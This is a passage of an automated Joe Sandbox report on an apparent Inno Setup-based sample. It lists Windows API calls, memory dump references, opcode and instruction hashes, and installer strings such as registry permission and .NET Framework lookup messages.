                                                                                        • Associated: 00000001.00000002.3555951387.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_1_2_400000_newwork.jbxd
                                                                                        Similarity
                                                                                        • API ID: ErrorLast
                                                                                        • String ID: Could not set permissions on the registry key because it currently does not exist.$Failed to set permissions on registry key (%d).$Setting permissions on registry key: %s\%s
                                                                                        • API String ID: 1452528299-4018462623
                                                                                        • Opcode ID: 2cd14b75b874af61ac3d45831295ca4897b993e1bd4af745d48f10d6dc1171d0
                                                                                        • Instruction ID: ad6b00cc897a6d1501f3fc6a2a631de3da5dc8c6e7b4eccdfad28332e4495c63
                                                                                        • Opcode Fuzzy Hash: 2cd14b75b874af61ac3d45831295ca4897b993e1bd4af745d48f10d6dc1171d0
                                                                                        • Instruction Fuzzy Hash: A121C870A046445FCB10DFA9C8826EEBBE4DF49319F50817BE408E7392D7785E098B6D
                                                                                        APIs
                                                                                        • MultiByteToWideChar.KERNEL32(00000000,00000000,00000000,00000000,?,00000400), ref: 00403CDE
                                                                                        • SysAllocStringLen.OLEAUT32(?,00000000), ref: 00403CE9
                                                                                        • MultiByteToWideChar.KERNEL32(00000000,00000000,?,00000000,00000000,00000000), ref: 00403CFC
                                                                                        • SysAllocStringLen.OLEAUT32(00000000,00000000), ref: 00403D06
                                                                                        • MultiByteToWideChar.KERNEL32(00000000,00000000,?,00000000,00000000,00000000,00000000,00000000,?,00000000,00000000,00000000), ref: 00403D15
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000001.00000002.3555596978.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000001.00000002.3555538160.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.3555763218.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.3555828098.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.3555892790.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.3555951387.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_1_2_400000_newwork.jbxd
                                                                                        Similarity
                                                                                        • API ID: ByteCharMultiWide$AllocString
                                                                                        • String ID:
                                                                                        • API String ID: 262959230-0
                                                                                        • Opcode ID: dcd45591e65b03bd276bb2a5b0fabad56ebf76f0c081827c2345b0a7b763a240
                                                                                        • Instruction ID: 657f84db466bd1c54801a2b30447fc2084338491f8142acf58a262d5883cef98
                                                                                        • Opcode Fuzzy Hash: dcd45591e65b03bd276bb2a5b0fabad56ebf76f0c081827c2345b0a7b763a240
                                                                                        • Instruction Fuzzy Hash: FCF0A4917442043BF21025A65C43F6B198CCB82B9BF50053FB704FA1D2D87C9D04427D
                                                                                        APIs
                                                                                        • SelectPalette.GDI32(00000000,00000000,00000000), ref: 00414419
                                                                                        • RealizePalette.GDI32(00000000), ref: 00414421
                                                                                        • SelectPalette.GDI32(00000000,00000000,00000001), ref: 00414435
                                                                                        • RealizePalette.GDI32(00000000), ref: 0041443B
                                                                                        • ReleaseDC.USER32(00000000,00000000), ref: 00414446
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000001.00000002.3555596978.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000001.00000002.3555538160.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.3555763218.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.3555828098.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.3555892790.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.3555951387.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_1_2_400000_newwork.jbxd
                                                                                        Similarity
                                                                                        • API ID: Palette$RealizeSelect$Release
                                                                                        • String ID:
                                                                                        • API String ID: 2261976640-0
                                                                                        • Opcode ID: c9c8aa66f6917016d7555c0ac5b3df2d15848593dde74026b2272496f15e705b
                                                                                        • Instruction ID: 3cc421e061c7a323c9855e33cbe13bf4890882f9e8533d15179bd5f7679f66d2
                                                                                        • Opcode Fuzzy Hash: c9c8aa66f6917016d7555c0ac5b3df2d15848593dde74026b2272496f15e705b
                                                                                        • Instruction Fuzzy Hash: A2018F7520C3806AE600A63D8C85A9F6BED9FCA718F15446EF495DB282DA7AC8018765
                                                                                        APIs
                                                                                          • Part of subcall function 0041F074: GetActiveWindow.USER32 ref: 0041F077
                                                                                          • Part of subcall function 0041F074: GetCurrentThreadId.KERNEL32 ref: 0041F08C
                                                                                          • Part of subcall function 0041F074: EnumThreadWindows.USER32(00000000,Function_0001F050), ref: 0041F092
                                                                                          • Part of subcall function 004231A8: GetSystemMetrics.USER32(00000000), ref: 004231AA
                                                                                        • OffsetRect.USER32(?,?,?), ref: 00424DC9
                                                                                        • DrawTextA.USER32(00000000,00000000,000000FF,?,00000C10), ref: 00424E8C
                                                                                        • OffsetRect.USER32(?,?,?), ref: 00424E9D
                                                                                          • Part of subcall function 00423564: GetCurrentThreadId.KERNEL32 ref: 00423579
                                                                                          • Part of subcall function 00423564: SetWindowsHookExA.USER32(00000003,00423520,00000000,00000000), ref: 00423589
                                                                                          • Part of subcall function 00423564: CreateThread.KERNEL32(00000000,000003E8,004234D0,00000000,00000000), ref: 004235AD
                                                                                          • Part of subcall function 00424B2C: SetTimer.USER32(00000000,00000001,?,004234B4), ref: 00424B47
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000001.00000002.3555596978.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000001.00000002.3555538160.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.3555763218.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.3555828098.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.3555892790.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.3555951387.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_1_2_400000_newwork.jbxd
                                                                                        Similarity
                                                                                        • API ID: Thread$CurrentOffsetRectWindows$ActiveCreateDrawEnumHookMetricsSystemTextTimerWindow
                                                                                        • String ID: vLB
                                                                                        • API String ID: 1477829881-1797516613
                                                                                        • Opcode ID: af4d35ceb7da7411f9a909d8da5f62e109762c4c9dbecdeb02cfa42cc05a337b
                                                                                        • Instruction ID: 1a85cd152e58b5c2614c87f396891e2b5808bef0cf689969089b0637ec596c27
                                                                                        • Opcode Fuzzy Hash: af4d35ceb7da7411f9a909d8da5f62e109762c4c9dbecdeb02cfa42cc05a337b
                                                                                        • Instruction Fuzzy Hash: C5812675A003188FCB14DFA8D880ADEBBF4FF88314F50416AE905AB296E738AD45CF44
                                                                                        APIs
                                                                                        • WNetGetUniversalNameA.MPR(00000000,00000001,?,00000400), ref: 00407003
                                                                                        • WNetOpenEnumA.MPR(00000001,00000001,00000000,00000000,?), ref: 0040707D
                                                                                        • WNetEnumResourceA.MPR(?,FFFFFFFF,?,?), ref: 004070D5
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000001.00000002.3555596978.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000001.00000002.3555538160.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.3555763218.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.3555828098.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.3555892790.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.3555951387.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_1_2_400000_newwork.jbxd
                                                                                        Similarity
                                                                                        • API ID: Enum$NameOpenResourceUniversal
                                                                                        • String ID: Z
                                                                                        • API String ID: 3604996873-1505515367
                                                                                        • Opcode ID: a9e747af3270ad6827a26b5e12e82ea9da9777e5f51a79d453bfa0d7b97e4fbe
                                                                                        • Instruction ID: 78f4b6eea80f90a9c0d6dbacb1000d6f5057f9b0a0312f2c839bfa0eabc808a5
                                                                                        • Opcode Fuzzy Hash: a9e747af3270ad6827a26b5e12e82ea9da9777e5f51a79d453bfa0d7b97e4fbe
                                                                                        • Instruction Fuzzy Hash: 14516470E04208AFDB11DF95C951AAFBBB9EF09304F1045BAE500BB3D1D778AE458B5A
                                                                                        APIs
                                                                                        • SetRectEmpty.USER32(?), ref: 0044D04E
                                                                                        • DrawTextA.USER32(00000000,00000000,00000000,?,00000D20), ref: 0044D079
                                                                                        • DrawTextA.USER32(00000000,00000000,00000000,00000000,00000800), ref: 0044D101
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000001.00000002.3555596978.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000001.00000002.3555538160.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.3555763218.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.3555828098.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.3555892790.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.3555951387.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_1_2_400000_newwork.jbxd
                                                                                        Similarity
                                                                                        • API ID: DrawText$EmptyRect
                                                                                        • String ID:
                                                                                        • API String ID: 182455014-2867612384
                                                                                        • Opcode ID: 9cefa38d4a8adbc35dceb9fbd70f94003a2f7c245499b58eac7a7a86e34dc042
                                                                                        • Instruction ID: ac611c4ae9e9b4e435f74cd3b872a097dcdbbef8ea8fa2dc8c743a2ef399c877
                                                                                        • Opcode Fuzzy Hash: 9cefa38d4a8adbc35dceb9fbd70f94003a2f7c245499b58eac7a7a86e34dc042
                                                                                        • Instruction Fuzzy Hash: 18517171E00248AFDB11DFA5C885BDEBBF8BF48308F18447AE845EB252D7789945CB64
                                                                                        APIs
                                                                                        • GetDC.USER32(00000000), ref: 0042EF9E
                                                                                          • Part of subcall function 0041A1E8: CreateFontIndirectA.GDI32(?), ref: 0041A2A7
                                                                                        • SelectObject.GDI32(?,00000000), ref: 0042EFC1
                                                                                        • ReleaseDC.USER32(00000000,?), ref: 0042F0A0
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000001.00000002.3555596978.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000001.00000002.3555538160.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.3555763218.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.3555828098.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.3555892790.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.3555951387.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_1_2_400000_newwork.jbxd
                                                                                        Similarity
                                                                                        • API ID: CreateFontIndirectObjectReleaseSelect
                                                                                        • String ID: ...\
                                                                                        • API String ID: 3133960002-983595016
                                                                                        • Opcode ID: 174dea87e3c77845355dc2bffde9c2636390ac865bcfddee608935e642ca7c05
                                                                                        • Instruction ID: de545d42c11d103cbad381cc3223c2b5efa9fdb4a6e9ae4bb0445229962d8c70
                                                                                        • Opcode Fuzzy Hash: 174dea87e3c77845355dc2bffde9c2636390ac865bcfddee608935e642ca7c05
                                                                                        • Instruction Fuzzy Hash: 5A316370B00128AFDB11EB96D841BAEB7F8EB09348F90447BE410A7392D7785E49CA59
                                                                                        APIs
                                                                                        • GetClassInfoA.USER32(00400000,?,?), ref: 0041647F
                                                                                        • UnregisterClassA.USER32(?,00400000), ref: 004164AB
                                                                                        • RegisterClassA.USER32(?), ref: 004164CE
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000001.00000002.3555596978.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000001.00000002.3555538160.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.3555763218.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.3555828098.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.3555892790.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.3555951387.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_1_2_400000_newwork.jbxd
                                                                                        Similarity
                                                                                        • API ID: Class$InfoRegisterUnregister
                                                                                        • String ID: @
                                                                                        • API String ID: 3749476976-2766056989
                                                                                        • Opcode ID: 32c7bff64fe8078beb5c73cee1a3f36bf3645a98757bc26b4be27a2261280048
                                                                                        • Instruction ID: c77080f262680b7bd3c4c6a37e0a11d074b1995aa9dd52ebf92fb76dd285a693
                                                                                        • Opcode Fuzzy Hash: 32c7bff64fe8078beb5c73cee1a3f36bf3645a98757bc26b4be27a2261280048
                                                                                        • Instruction Fuzzy Hash: B8316D702042409BD720EF69C981B9B77E5AB89308F04457FF949DB392DB39DD44CB6A
                                                                                        APIs
                                                                                        • GetFileAttributesA.KERNEL32(00000000,00498B60,00000000,00498306,?,?,00000000,0049B628), ref: 00498280
                                                                                        • SetFileAttributesA.KERNEL32(00000000,00000000,00000000,00498B60,00000000,00498306,?,?,00000000,0049B628), ref: 004982A9
                                                                                        • MoveFileExA.KERNEL32(00000000,00000000,00000001(MOVEFILE_REPLACE_EXISTING)), ref: 004982C2
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000001.00000002.3555596978.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000001.00000002.3555538160.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.3555763218.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.3555828098.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.3555892790.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.3555951387.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_1_2_400000_newwork.jbxd
                                                                                        Similarity
                                                                                        • API ID: File$Attributes$Move
                                                                                        • String ID: isRS-%.3u.tmp
                                                                                        • API String ID: 3839737484-3657609586
                                                                                        • Opcode ID: 6425da845d9cf075168c9006b2f4cde8adeeb665172db9fe24e9d2d56fbf6a76
                                                                                        • Instruction ID: fc33356634acd7bce8b4c2965ae56e8bcff63ef6fc68eceab8a95db248f88364
                                                                                        • Opcode Fuzzy Hash: 6425da845d9cf075168c9006b2f4cde8adeeb665172db9fe24e9d2d56fbf6a76
                                                                                        • Instruction Fuzzy Hash: 0B216471E00609ABCF10EFA9C8819AFBBB8AF45714F10457FB814B72D1DB389E018A59
                                                                                        APIs
                                                                                        • MessageBoxA.USER32(00000000,Runtime error at 00000000,Error,00000000), ref: 00404DC5
                                                                                        • ExitProcess.KERNEL32 ref: 00404E0D
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000001.00000002.3555596978.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000001.00000002.3555538160.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.3555763218.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.3555828098.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.3555892790.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.3555951387.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_1_2_400000_newwork.jbxd
                                                                                        Similarity
                                                                                        • API ID: ExitMessageProcess
                                                                                        • String ID: Error$Runtime error at 00000000
                                                                                        • API String ID: 1220098344-2970929446
                                                                                        • Opcode ID: 4aa0907dffceb0697d192a833af99b379258e6819ee5eddde657f3822e72bbb6
                                                                                        • Instruction ID: e2df0dcbf1ce8e07228a8ae3c957e3f7be2bf5582065763199918d440bd3f461
                                                                                        • Opcode Fuzzy Hash: 4aa0907dffceb0697d192a833af99b379258e6819ee5eddde657f3822e72bbb6
                                                                                        • Instruction Fuzzy Hash: 8E219560A442414ADB11A779BA8571B3B91D7E5348F04817BE710A73E3C77C8C4487ED
                                                                                        APIs
                                                                                          • Part of subcall function 0042C804: GetFullPathNameA.KERNEL32(00000000,00001000,?), ref: 0042C828
                                                                                          • Part of subcall function 00403CA4: MultiByteToWideChar.KERNEL32(00000000,00000000,00000000,00000000,?,00000400), ref: 00403CDE
                                                                                          • Part of subcall function 00403CA4: SysAllocStringLen.OLEAUT32(?,00000000), ref: 00403CE9
                                                                                        • LoadTypeLib.OLEAUT32(00000000,00000000), ref: 00456C50
                                                                                        • RegisterTypeLib.OLEAUT32(00000000,00000000,00000000), ref: 00456C7D
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000001.00000002.3555596978.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000001.00000002.3555538160.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.3555763218.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.3555828098.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.3555892790.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.3555951387.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_1_2_400000_newwork.jbxd
                                                                                        Similarity
                                                                                        • API ID: Type$AllocByteCharFullLoadMultiNamePathRegisterStringWide
                                                                                        • String ID: LoadTypeLib$RegisterTypeLib
                                                                                        • API String ID: 1312246647-2435364021
                                                                                        • Opcode ID: 99adc2ab1761f2fa15f1ac99c5dc87c93e60f5f8f6cafab150dd189b668492eb
                                                                                        • Instruction ID: 3ed1135b8019c5f4588910a0035f5c9e1cabb82a18fedb82429c118dce795412
                                                                                        • Opcode Fuzzy Hash: 99adc2ab1761f2fa15f1ac99c5dc87c93e60f5f8f6cafab150dd189b668492eb
                                                                                        • Instruction Fuzzy Hash: 2911B430B00604AFDB02EFA6CD51A5EB7BDEB89705F5184B6FC44D3752DA389904CA24
                                                                                        APIs
                                                                                        • SendMessageA.USER32(00000000,00000B06,00000000,00000000), ref: 0045716E
                                                                                        • SendMessageA.USER32(00000000,00000B00,00000000,00000000), ref: 0045720B
                                                                                        Strings
                                                                                        • Failed to create DebugClientWnd, xrefs: 004571D4
                                                                                        • Cannot debug. Debugger version ($%.8x) does not match Setup version ($%.8x), xrefs: 0045719A
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000001.00000002.3555596978.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000001.00000002.3555538160.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.3555763218.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.3555828098.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.3555892790.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.3555951387.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_1_2_400000_newwork.jbxd
                                                                                        Similarity
                                                                                        • API ID: MessageSend
                                                                                        • String ID: Cannot debug. Debugger version ($%.8x) does not match Setup version ($%.8x)$Failed to create DebugClientWnd
                                                                                        • API String ID: 3850602802-3720027226
                                                                                        • Opcode ID: 3689ec14d1edae2f57f0a744906126f7255bff4f1947e1d6bbead030c2853570
                                                                                        • Instruction ID: a6ca84080c04e90ac639e3db27cd2c1e4b46fe4ea5f20cae781d9f83c3d7e460
                                                                                        • Opcode Fuzzy Hash: 3689ec14d1edae2f57f0a744906126f7255bff4f1947e1d6bbead030c2853570
                                                                                        • Instruction Fuzzy Hash: 1011E770248240AFD710AB69AC85B5FBBD89B54319F15407AFA849B383D7798C18C7AE
                                                                                        APIs
                                                                                          • Part of subcall function 004242C4: SetWindowTextA.USER32(?,00000000), ref: 004242DC
                                                                                        • GetFocus.USER32 ref: 00478757
                                                                                        • GetKeyState.USER32(0000007A), ref: 00478769
                                                                                        • WaitMessage.USER32(?,00000000,00478790,?,00000000,004787B7,?,?,00000001,00000000,?,?,?,00480402,00000000,004812C8), ref: 00478773
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000001.00000002.3555596978.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000001.00000002.3555538160.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.3555763218.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.3555828098.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.3555892790.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.3555951387.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_1_2_400000_newwork.jbxd
                                                                                        Similarity
                                                                                        • API ID: FocusMessageStateTextWaitWindow
                                                                                        • String ID: Wnd=$%x
                                                                                        • API String ID: 1381870634-2927251529
                                                                                        • Opcode ID: c0ca7a1e78f0957e158d44939737d51478939e9ac1b0c689120181bc9166dade
                                                                                        • Instruction ID: f17a5035e7dee30901ec9a03c3a5a372f1d0714b29ccd98a4f066b2945bd060b
                                                                                        • Opcode Fuzzy Hash: c0ca7a1e78f0957e158d44939737d51478939e9ac1b0c689120181bc9166dade
                                                                                        • Instruction Fuzzy Hash: CE11C634A40244AFD704EF65DC49A9EBBF8EB49314F6184BFF409E7681DB386D00CA69
                                                                                        APIs
                                                                                        • FileTimeToLocalFileTime.KERNEL32(?), ref: 0046E618
                                                                                        • FileTimeToSystemTime.KERNEL32(?,?,?), ref: 0046E627
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000001.00000002.3555596978.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000001.00000002.3555538160.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.3555763218.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.3555828098.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.3555892790.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.3555951387.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_1_2_400000_newwork.jbxd
                                                                                        Similarity
                                                                                        • API ID: Time$File$LocalSystem
                                                                                        • String ID: %.4u-%.2u-%.2u %.2u:%.2u:%.2u.%.3u$(invalid)
                                                                                        • API String ID: 1748579591-1013271723
                                                                                        • Opcode ID: 93d3f9926fe1e9ec47fc0153e923e0389e011619b8f85a7a05f57e02ab74589b
                                                                                        • Instruction ID: 5dd65cae4c1adac9d47cc9ad6336eda1851498fedff4a8a979bd050f9c4a6815
                                                                                        • Opcode Fuzzy Hash: 93d3f9926fe1e9ec47fc0153e923e0389e011619b8f85a7a05f57e02ab74589b
                                                                                        • Instruction Fuzzy Hash: A81136A440C3909ED340DF2AC04432BBAE4AB99704F44892EF8C8C6381E779C848DBB7
                                                                                        APIs
                                                                                        • SetFileAttributesA.KERNEL32(00000000,00000020), ref: 00453F83
                                                                                          • Part of subcall function 00406F50: DeleteFileA.KERNEL32(00000000,0049B628,004986F1,00000000,00498746,?,?,00000005,?,00000000,00000000,00000000,Inno-Setup-RegSvr-Mutex,?,00000005,00000000), ref: 00406F5B
                                                                                        • MoveFileA.KERNEL32(00000000,00000000), ref: 00453FA8
                                                                                          • Part of subcall function 0045349C: GetLastError.KERNEL32(00000000,00454031,00000005,00000000,00454066,?,?,00000000,0049B628,00000004,00000000,00000000,00000000,?,004983A5,00000000), ref: 0045349F
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000001.00000002.3555596978.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000001.00000002.3555538160.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.3555763218.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.3555828098.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.3555892790.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.3555951387.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_1_2_400000_newwork.jbxd
                                                                                        Similarity
                                                                                        • API ID: File$AttributesDeleteErrorLastMove
                                                                                        • String ID: DeleteFile$MoveFile
                                                                                        • API String ID: 3024442154-139070271
                                                                                        • Opcode ID: ad4ba0b838e9d5317ad6887f6d8cb75152b6b17696a4ed4ee46c007163692804
                                                                                        • Instruction ID: b5871bee3d194af1fa843ac656f6d820fc0ba16d57580c91db5694710367c43f
                                                                                        • Opcode Fuzzy Hash: ad4ba0b838e9d5317ad6887f6d8cb75152b6b17696a4ed4ee46c007163692804
                                                                                        • Instruction Fuzzy Hash: AEF062716142045BD701FBA2D84266EA7ECDB8435EF60443BB900BB6C3DA3C9E094529
                                                                                        APIs
                                                                                          • Part of subcall function 0042DE1C: RegOpenKeyExA.ADVAPI32(80000002,System\CurrentControlSet\Control\Windows,;H,?,00000001,?,?,00483BE3,?,00000001,00000000), ref: 0042DE38
                                                                                        • RegCloseKey.ADVAPI32(00000000,00000000,00000001,00000000,?,00000000,?,00000002,004594A1,00000000,00459659,?,00000000,00000000,00000000), ref: 004593B1
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000001.00000002.3555596978.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000001.00000002.3555538160.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.3555763218.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.3555828098.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.3555892790.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.3555951387.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_1_2_400000_newwork.jbxd
                                                                                        Similarity
                                                                                        • API ID: CloseOpen
                                                                                        • String ID: .NET Framework not found$InstallRoot$SOFTWARE\Microsoft\.NETFramework
                                                                                        • API String ID: 47109696-2631785700
                                                                                        • Opcode ID: be4fb59b900ee74e718d87cdc4fcd1eef43a9c564c0a5ec1af3f625bb6e6dd39
